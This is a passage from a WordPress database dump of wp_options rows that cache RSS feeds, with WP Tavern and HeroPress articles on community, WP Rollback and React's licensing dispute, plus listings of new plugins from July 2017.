stick to my bubble, once the meeting was over I was back on my own. And Then I Went To WordCamp Until I got to attend my first big WordCamp, the last one held in San Francisco, I was ecstatic! I’d never been to a big conference before, as I didn’t like crowds, but I knew some of the people who would be there. They were people who had been friendly and inviting in the most genuine way imaginable. It’s not easy being worried whenever you’re out amongst people, but this group of people, this community, I didn’t have that fear around them. I somehow made WordCamps my safe space. They are where I can, if only for a short while, leave that bubble, leave the need to be alone, and be a part of something great! I use them as fuel to get through the hard times, I can look forward to meeting people, people who value my opinions and my experience. People who genuinely want to listen and most of all, care about you! The WordPress community is, slowly but surely, helping me get rid of my ingrown fear of the unknown, of others. The community is helping me become myself again. The post Becoming Myself Again appeared first on HeroPress.\'>HeroPress: Becoming Myself Again</a></li><li><a class=\'rsswidget\' href=\'https://wptavern.com/new-wordpress-contributors-meeting-provides-opportunities-to-ask-questions-and-learn-the-ropes\' title=\'Contributing to WordPress or other open source projects can be intimidating for first-time contributors. Sometimes, all you need is a helping hand to overcome fear, intimidation, or other barriers. In 2013, with the help of Konstantin Obenland, a WordPress core developer, I overcame my fear and contributed my first patch to WordPress. This is one of the principles behind a new weekly meeting that is geared towards new contributors. “The new contributors meeting is the perfect place to come if you are new to contributing to WordPress core and have questions,” Adam Silverstein, WordPress core contributor, said. Every Wednesday at 3PM Eastern Daylight Time, users can visit the #core WordPress Slack channel and ask questions related to patches, tickets, and review the good-first-bugs report on Trac. The first meeting was held on July 5th where participants asked questions about working with Git in WordPress core, applying patches, and unit testing. In the second meeting, participants discussed whether or not new contributors are allowed to make changes to tickets. Other topics mentioned include, which repositories to use, clarification on contributing to core versus updating the WordPress Developer’s site, and which tickets to select for review. The next meeting is on Wednesday, July 19th at 3PM Eastern. If you have any questions on how to contribute to WordPress, be sure to join the WordPress #core Slack channel at that time and ask away. Meeting notes with links to discussions, tickets mentioned, and other resources are published on the Make WordPress Core blog under the #new-contributors tag \'>WPTavern: New WordPress Contributors Meeting Provides Opportunities to Ask Questions and Learn the Ropes</a></li><li><a class=\'rsswidget\' href=\'https://wptavern.com/wp-rollback-adds-multisite-compatibility-and-changelog-preview\' title=\' In the two years since WP Rollback launched on WordPress.org, the plugin has racked up more than 30,000 active installations with nearly all 5-star reviews. It allows users to roll back any WordPress.org plugin or theme to a previous version with just a few clicks and also supports beta versions of plugins. It’s easy to see why the plugin is so popular. Navigating buggy updates is a natural part of life when maintaining a self-hosted website and not all users have a separate testing environment for their websites. This tool gives them a basic diagnostic tool and the confidence to apply updates knowing they can easily roll it back in case of a problem. Many reviewers cite the plugin as having been “a lifesaver” when applying WooCommerce or Yoast SEO updates that had unexpected results. The lone one-star review of WP Rollback was given because the user anticipated multisite compatibility and was unable to get it to work. That issue has been solved in the latest update. WP Rollback 1.5 is fully compatible with multisite networks, giving super admins the ability to roll back extensions from the network plugin/themes screen or from the the plugins/themes screen of the primary site in the network. Sub-sites do not have the ability to roll back plugins and themes for the entire network. The UI for rolling back themes on the network admin screen is identical to the plugin screens, as multisite doesn’t have the fancy theme preview screen that single site installs have. Version 1.5 also adds the ability for users to preview the changelog for previous versions of a plugin. This makes it convenient for users to quickly view the changes for each version without leaving the admin.  WordImpress, the folks behind WP Rollback, have considered adding core rollbacks and database savepoints, but both features have serious potential drawbacks that could turn it into a high support-demanding plugin. In its current state, the plugin is virtually support-free. Matt Cromwell, Head of Support and Community Outreach at WordImpress, said the team thought about monetizing the plugin in the beginning, but is not pursing any plans to do so at this time. “We think of it as just one of the many ways we are giving back to the WP community,” Cromwell said. “Our preference would be for the core team to consider it as a potential feature plugin for eventual core inclusion.” Cromwell said WordImpress hasn’t made any intentional steps to see if core folks are interested in WP Rollback becoming a feature plugin, but the team has purposely built it to be as close to core standards as possible. He believes it would be relatively easy to implement in WordPress. Suggestions for new features, general feedback, and bug reports are welcome on WP Rollback’s GitHub repository. The plugin’s authors recommend backing up your site before using it to rollback plugins and themes or testing rollbacks on a staging site first. WP Rollback is not capable of rolling back changes a plugin update has made to the database, so a backup can come in handy if the database changes are incompatible with previous versions. \'>WPTavern: WP Rollback Adds Multisite Compatibility and Changelog Preview</a></li><li><a class=\'rsswidget\' href=\'https://wptavern.com/react-users-petition-facebook-to-re-license-react-js-after-apache-software-foundation-bans-bsdpatents-license-in-dependencies\' title=\' The Apache Software Foundation issued a notice over the weekend, indicating that it has added Facebook’s BSD+Patents license to its Category X list of disallowed licenses for Apache PMC members. This is the license that Facebook uses for most of its open source projects. A representative from Facebook’s RocksDB team commented on the Apache Foundation’s post to advise that the project will meet the August 31st deadline for relicensing in order to be in compliance with Apache PMC member requirements, and that change has been committed today: The RocksDB team is adjusting the licensing such that it will be dual-licensed under the Apache 2 and GPL 2 (for MySQL compatibility) licenses. This should happen shortly and well ahead of August 31st. I’ll leave the history and philosophy around licensing alone since it’s generally a complex discussion to have and I’m not sure that it has actually been fully captured in this thread especially vis a vis Facebook’s intent. Hopefully this morning’s guidance to PMCs can be adjusted since I don’t think any of us see a bunch of extra engineering effort as a desirable thing across the ASF projects which are already making use of RocksDB In light of the ASF Legal Affairs Committee’s decision to disallow the BSD+Patents License in Apache projects, ASF member Joan Touzet opened an issue on the React repository urging Facebook to consider re-licensing React.js under Apache License v2.0 and GPL 2:  This has led to a lot of upset and frustration in the Apache community, especially from projects requiring similarly-licensed code as direct dependencies – the chief of these being RocksDB. We (the Apache Software Foundation) have just received word that RocksDB will be re-licensing their code under the dual Apache License v2.0 and GPL 2 licenses. As a user of React.JS in an ASF top-level project (Apache CouchDB), please consider re-licensing React.JS under similar terms. Otherwise, many ASF projects such as our own will have to stop relying on and building with React. Although the re-licensing of RocksDB solves that particular project’s problem, ASF’s ban of Facebook’s BSD+Patents license means other widely used technologies from Facebook, including React.js, are still banned. This is likely to cause problems for many open source projects. Harshavardhana, from the Minio team, commented in support of the petition to Facebook for re-licensing React. “Our object storage browser UI is based on React and we are Apache 2.0 licensed,” he said. “It would be unfortunate and time consuming to migrate but we will have to do that in lieu of new information regarding Apache incompatibility. Please consider re-licensing React.” Contributors to Om, a ClojureScript interface for React, are also discussing whether or not the ASF’s new requirements will affect their project. Greg Stein, commenting on behalf of ASF, clarified the reasons behind the organization’s decision to ban Facebook’s BSD+Patents license: Please note that the ASF chose this path for policy reasons, rather than “license incompatibility”. We don’t want downstream users of Apache code to be surprised by the PATENTS grant that (was) in RocksDB and (is) in React. Users should only need to follow the ALv2, with no further constraints. These license can work together (IMO) and simply provide two sets of restrictions upon users. Stein said it was not ASF’s lawyers who made the decision but rather the organization’s policy decision to “disallow FB/BSD+Patent license to be mixed into the software the Foundation releases to users.” Facebook is Internally Discussing the Re-Licensing Matter Dan Abramov, co-author of Redux, Create React App, and React Hot Loader, joined the discussion on GitHub regarding re-licensing with a brief and ambiguous summary about how Facebook is handling the petition to re-license. “To give you a small update, there are going to be more internal discussions about this for about a week,” Abramov said. “This is about as much as I can say. I wouldn’t be too optimistic about this changing for React but we’ll see. @daveman692 has kindly agreed to provide an update when these discussions are over.” Dropping the patent grant entirely, which would be the most convenient way of solving this issue for open source projects, isn’t likely to happen. React has already gone through re-licensing twice during its short history. It was originally licensed under Apache 2.0 but this was changed in October 2014 to the BSD License plus the patent grant, which included a highly controversial termination provision. In April 2015, the patent grant was changed slightly to allow licensees to continue to use the software in the event that a patent lawsuit did not include a counterclaim against Facebook or its affiliates in a matter unrelated to React.js. The termination provision in Facebook’s BSD+Patents License continues to be unpopular and is regarded suspiciously by many open source project maintainers. When the Drupal project began considering a client-side framework to supersede Backbone.js, Dries Buytaert passed on React based on what he said was “a potentially unacceptable patent clause,” citing pushback from WordPress.com’s Calypso and React contributors. The WordPress open source project has not formally announced its decision on which JavaScript framework will be included in core, but all signs point to React. WordPress’ upcoming Gutenberg editor is built on React and its chief contributors are Automattic employees who work on React-based products for WordPress.com. Gutenberg continues to plough forward at a breakneck pace with no indication of a rewrite, and WordPress co-creator Matt Mullenweg has been outspoken about his preference for using React. Although Automattic’s legal counsel has said the company is comfortable using React for its product under the project’s current license , others in the WordPress community are not as amenable to including the framework in core. The Open Source Initiative (OSI) includes a generic BSD+Patent license listed among its approved licenses, but Facebook’s particular BSD+Patent license has not been submitted. Robert Pierce, a partner at El Camino Legal, contends that the license termination provision ought to be impermissible in an open source license because it exists to protect Facebook from patent litigation that is completely unrelated to React code: Facebook touts React.js as open source software. But in my mind the license termination provision of the Additional Grant of Patent Rights takes the offering outside the realm of open source software. The patent license offered in the Additional Grant of Patent Rights (v.2) is conditioned upon the licensee not bringing a patent infringement lawsuit against Facebook or its affiliates. Thus, the licensee pays a price to use the library. It is not a price paid with money. The price demanded by Facebook for use of the library is that the licensee refrain from exercising any of its patent rights against Facebook or its affiliates. Pierce views Facebook’s publication of React source code as leverage to win some protection against patent lawsuits, which he deems to be “too greedy an approach for Facebook to claim open source status.” The open source community has widely speculated about the implications of including Facebook’s BSD+Patent license as a dependency, but the license has not yet been tested in court. The Apache Software Foundation is the first major organization to take a hard line stance on the controversial license and this has caught Facebook’s attention. Facebook representatives have promised an update on the petition for re-licensing after its internal discussions have concluded. \'>WPTavern: React Users Petition Facebook to Re-license React.js after Apache Software Foundation Bans BSD+Patents License in Dependencies</a></li></ul></div>', 'no'),
(2856, 'db_upgraded', '', 'yes'),
(121512, '_transient_feed_mod_ac0b00fe65abe10e0c5b588f3ed8c7ca', '1500471330', 'no'),
(121510, '_transient_timeout_feed_ac0b00fe65abe10e0c5b588f3ed8c7ca', '1500514530', 'no'),
(121511, '_transient_timeout_feed_mod_ac0b00fe65abe10e0c5b588f3ed8c7ca', '1500514530', 'no'),
(121523, '_transient_timeout_feed_77fa140e07ce53fe8c87136636f83d72', '1500514535', 'no');
INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(121524, '_transient_feed_77fa140e07ce53fe8c87136636f83d72', 'a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:49:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n		\n		\n		\n		\n		\n		\n		\n		\n		\n	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"New — WordPress Plugins\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wordpress.org/plugins\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"Plugins extend and expand the functionality of WordPress.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:13:\"lastBuildDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 19 Jul 2017 13:23:32 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"en-US\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"generator\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"https://wordpress.org/?v=4.9-alpha-41088\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:10:{i:0;a:6:{s:4:\"data\";s:30:\"\n		\n		\n		\n		\n		\n		\n		\n				\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"Ultimate Private Member Portal Lite\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"https://wordpress.org/plugins/ultimate-private-member-portal-lite/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 19 Jul 2017 13:22:33 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"https://wordpress.org/plugins/ultimate-private-member-portal-lite/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:104:\"Ultimate Private Member Portal Lite provides the ability to add private content specific for each&#8230;\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"nimeshrmr\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:2637:\"<p><!--section=description--></p>\n<p><a href=\"http://www.wpexpertdeveloper.com/ultimate-private-member-portal-lite\" rel=\"nofollow\">Ultimate Private Member Portal Lite</a> provides the ability to add private content specific for each user from the backend and display the content only to the user on frontend with a shortcode. Private content on portal supports shortcodes and embeds created from WordPress editor.</p>\n<h3>About WP Expert Developer</h3>\n<p>WPExpert Developer is a website and blog created to provide resources from top WordPress developers. Our prmiary goal is to provide top quality resources to WordPress users and guide beginner developers to become experts. You can access many top quality plugins, books, presentations, articles and tutorials at www.wpexpertdeveloper.com. We hope you enjoyed using this plugin. Following section contains some of the other plugins by WPExpert Developer.</p>\n<blockquote>\n<ul>\n<li><a href=\"http://www.wpexpertdeveloper.com/wp-private-content-pro/\" rel=\"nofollow\">WP Private Content PRO</a></li>\n<li><a href=\"http://www.wpexpertdeveloper.com/woocommerce-conditional-payment-methods-pro/\" rel=\"nofollow\">Conditional Payment Methods PRO for WooCommerce</a></li>\n<li><a href=\"https://goo.gl/FjiZ1N\" rel=\"nofollow\">User Profiles Made Easy</a></li>\n<li><a href=\"https://wordpress.org/plugins/isearch/\">ISearch</a></li>\n<li><a href=\"http://goo.gl/zAHO9Q\" rel=\"nofollow\">Rich Text Editor Field for Contact Form 7</a></li>\n</ul>\n</blockquote>\n<p><!--section=installation--></p>\n<ol>\n<li>Upload the plugin files to the <code>/wp-content/plugins/ultimate-private-member-portal-lite</code> directory, or install the plugin through the WordPress plugins screen directly.</li>\n<li>Activate the plugin through the &#8216;Plugins&#8217; screen in WordPress</li>\n<li>Follow the <a href=\"http://www.wpexpertdeveloper.com/ultimate-private-member-portal-lite/\" rel=\"nofollow\">Documentation and Usage</a>.</li>\n</ol>\n<p><!--section=changelog--></p>\n<h4>1.0</h4>\n<ul>\n<li>Add private content to users private portal</li>\n<li>Supports shortcodes, videos, audios using WordPress editor</li>\n</ul>\n<p><!--section=faq--></p>\n<dl>\n<dt>Installation Instructions</dt>\n<dd>\n<ol>\n<li>Upload the plugin files to the <code>/wp-content/plugins/ultimate-private-member-portal-lite</code> directory, or install the plugin through the WordPress plugins screen directly.</li>\n<li>Activate the plugin through the &#8216;Plugins&#8217; screen in WordPress</li>\n<li>Follow the <a href=\"http://www.wpexpertdeveloper.com/ultimate-private-member-portal-lite/\" rel=\"nofollow\">Documentation and Usage</a>.</li>\n</ol>\n</dd>\n</dl>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:30:\"\n		\n		\n		\n		\n		\n		\n		\n				\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"JMB Post Feeds\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"https://wordpress.org/plugins/jmb-post-feeds/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 19 Jul 2017 13:18:01 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"https://wordpress.org/plugins/jmb-post-feeds/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:74:\"Create post feeds in CSV, XML, RSS, Google RSS, Text &#38; Custom formats.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"jmb272\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:2325:\"<p><!--section=description--></p>\n<p>Create post feeds in CSV, XML, RSS, Google RSS, Text &amp; Custom formats.</p>\n<p>Features:</p>\n<ul>\n<li>Add your own custom format using the &#8216;jmb_pf_plugin_settings&#8217; filter.</li>\n<li>Filter &amp; Refine search options to restrict the posts that appear in a feed.</li>\n<li>Choose the post types to include in the feed(s).</li>\n<li>Choose what formats to export a feed to.</li>\n<li>Set a feed to update automatically whenever a post matching the feed&#8217;s criteria is updated.</li>\n</ul>\n<p><!--section=installation--></p>\n<ol>\n<li>Upload the plugin to the &#8216;/wp-content/plugins&#8217; directory.</li>\n<li>Activate the plugin through the &#8216;Plugins&#8217; menu in WordPress.</li>\n</ol>\n<p><!--section=faq--></p>\n<dl>\n<dt>Installation Instructions</dt>\n<dd>\n<ol>\n<li>Upload the plugin to the &#8216;/wp-content/plugins&#8217; directory.</li>\n<li>Activate the plugin through the &#8216;Plugins&#8217; menu in WordPress.</li>\n</ol>\n</dd>\n<dt>How do I create my own export format?</dt>\n<dd>\n<p>First, register your Export Format with the plugin like so:</p>\n<p> &#8216;Text 2&#8217;,<br />\n        &#8216;ext&#8217;      =&gt; &#8216;-text-2.txt&#8217;,<br />\n        &#8216;callback&#8217; =&gt; &#8216;jmb_pf_text_2_format&#8217;,<br />\n    );</p>\n<p>    return $settings;<br />\n});<br />\n?&gt;</p>\n<p>Then create the Export Function that takes the feed data and exports it to a file, like so:</p>\n<p> &#8221;,<br />\n        &#8216;posts&#8217;     =&gt; array(),<br />\n    ), $args );</p>\n<p>    if ( empty( $a[&#8216;posts&#8217;] ) ) {<br />\n        return;<br />\n    }</p>\n<p>    $text_content = &#8221;;</p>\n<p>    foreach ( $a[&#8216;posts&#8217;] as $post ) {<br />\n        if ( ! empty( $text_content ) ) {<br />\n            $text_content .= &#8220;\\n&#8221;;<br />\n        }</p>\n<p>        foreach ( $post as $data_name =&gt; $data_value ) {<br />\n            $text_content .= sprintf( &#8220;%s &#8220;, $data_value );<br />\n        }<br />\n    }</p>\n<p>    if ( ! empty( $a[&#8216;file_name&#8217;] ) ) {<br />\n        $fp = fopen( $a[&#8216;file_name&#8217;], &#8216;w&#8217; );<br />\n        fputs( $fp, $text_content );<br />\n        fclose( $fp );</p>\n<p>        return true;<br />\n    }</p>\n<p>    return $text_content;<br />\n}<br />\n?&gt;</dd>\n</dl>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:30:\"\n		\n		\n		\n		\n		\n		\n		\n				\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"WEBSMS.RU WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"https://wordpress.org/plugins/websms-ru/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 19 Jul 2017 13:11:03 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://ru.wordpress.org/plugins/websms-ru-wordpress/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:86:\"SMS уведомления о событиях WordPress через шлюз WEBSMS.RU\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"elafonisy\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:3486:\"<p><!--section=description--></p>\n<p>SMS уведомления о событиях в блоге WordPress через шлюз WEBSMS.RU.<br />\n<a href=\"http://websms.ru/services/sending/request\" rel=\"nofollow\">САЙТ</a> | <a href=\"support@websms.ru\" rel=\"nofollow\">Поддержка</a></p>\n<h4>Features</h4>\n<ul>\n<li>Уведомление о регистрации нового пользователя.</li>\n<li>Уведомление о том что пользователь залогинился на сайте.</li>\n<li>Уведомление о публикации нового поста.</li>\n<li>Уведомление об обновлении поста.</li>\n</ul>\n<p><!--section=installation--></p>\n<ol>\n<li>Через консоль\n<ul>\n<li>В административной панели перейдите на страницу Плагины и нажмите Добавить новый.</li>\n<li>Перейдите на вкладку Загрузить, нажмите Обзор и выберите архив с плагином. Нажмите Установить.</li>\n</ul>\n</li>\n<li>По FTP\n<ul>\n<li>распакуйте архив и загрузите &#8220;websms-ru-wordpress&#8221; в папку ваш-домен/wp-content/plugins</li>\n</ul>\n</li>\n<li>После того, как плагин будет установлен, нажмите Активировать плагин.</li>\n<li>Наведите курсор на пункт меню Настройки и выберите WEBSMS.RU</li>\n<li>В настройках введите логин, пароль, телефоны получателей СМС-оповещений.</li>\n<li>Выберите события WordPress, на которые вы хотели бы получать оповещения, откорректируйте текст SMS-оповещений</li>\n<li>Сохраните изменения, кликнув на кнопке &#8220;Сохранить&#8221;.</li>\n</ol>\n<p><!--section=changelog--></p>\n<h4>1.0.0 &#8211; 2017-07-19</h4>\n<ul>\n<li>Initial release</li>\n</ul>\n<p><!--section=faq--></p>\n<dl>\n<dt>Installation Instructions</dt>\n<dd>\n<ol>\n<li>Через консоль\n<ul>\n<li>В административной панели перейдите на страницу Плагины и нажмите Добавить новый.</li>\n<li>Перейдите на вкладку Загрузить, нажмите Обзор и выберите архив с плагином. Нажмите Установить.</li>\n</ul>\n</li>\n<li>По FTP\n<ul>\n<li>распакуйте архив и загрузите &#8220;websms-ru-wordpress&#8221; в папку ваш-домен/wp-content/plugins</li>\n</ul>\n</li>\n<li>После того, как плагин будет установлен, нажмите Активировать плагин.</li>\n<li>Наведите курсор на пункт меню Настройки и выберите WEBSMS.RU</li>\n<li>В настройках введите логин, пароль, телефоны получателей СМС-оповещений.</li>\n<li>Выберите события WordPress, на которые вы хотели бы получать оповещения, откорректируйте текст SMS-оповещений</li>\n<li>Сохраните изменения, кликнув на кнопке &#8220;Сохранить&#8221;.</li>\n</ol>\n</dd>\n</dl>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:30:\"\n		\n		\n		\n		\n		\n		\n		\n				\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:17:\"Log HTTP Requests\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"https://wordpress.org/plugins/log-http-requests/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 19 Jul 2017 13:04:33 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"https://wordpress.org/plugins/log-http-requests/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"Log and view all WP HTTP requests\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Matt Gibbs\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:1008:\"<p><!--section=description--></p>\n<h4>Log and view all WP HTTP requests</h4>\n<p>How long do all those (core / plugin / theme) update checks take to run? What data about my site is being sent out? The answers to these questions are just a few clicks away.</p>\n<p>This plugin logs all WP_HTTP requests and displays them in a table listing for easy viewing. It also stores the runtime of each HTTP requests.</p>\n<h4>Important Links</h4>\n<ul>\n<li><a href=\"https://github.com/FacetWP/log-http-requests\" rel=\"nofollow\">Github →</a></li>\n</ul>\n<p><!--section=installation--></p>\n<ol>\n<li>Download and activate the plugin.</li>\n<li>Browse to the <code>Log HTTP Requests</code> menu to view log entries.</li>\n</ol>\n<p><!--section=changelog--></p>\n<h4>1.0.0</h4>\n<ul>\n<li>Initial 